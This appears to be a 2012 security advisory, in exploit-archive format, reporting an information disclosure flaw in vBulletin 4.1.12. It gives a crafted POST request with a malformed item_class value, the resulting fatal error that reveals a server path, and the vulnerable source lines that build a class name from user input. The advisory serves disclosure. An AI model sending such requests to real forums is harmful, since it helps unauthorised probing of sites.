[ TITLE ....... ][ vBulletin 4.1.12 - information disclosure for logged in users
[ DATE ........ ][ 30.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://vbulletin.com
[ VERSION ..... ][ 
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [

[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...

[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)

[--------------------------------------------[
[ 2. What is the type of vulnerability?
Information disclosure bug.

[--------------------------------------------[
[ 3. Where is bug :)

...from Burp...
POST /vb/content.php?1-the-front-page/addcontent HTTP/1.1
Host: localhost
(...)
contenttypeid=hello&item_type=content&item_class=HERE;]&item_id=hello&s=&securitytoken=&nodeid=hello
...from Burp...

Response should be:
...from Burp...
HTTP/1.1 200 OK
Date: Mon, 30 Apr 2012 06:58:00 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 147

<br />
<b>Fatal error</b>:  Class 'vBForum_Content_Post' not found in <b>/home/kuba/www/vb/content.php</b> on line <b>176</b><br />

...from Burp...

So line 176 (and friends):
...cut...
   172          public static function create($package, $class, $contentid = false)
   173          {
   174                  $class = $package . '_Content_' . $class;
   175  
   176                  return new $class($contentid);
   177          }
...cut...

[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[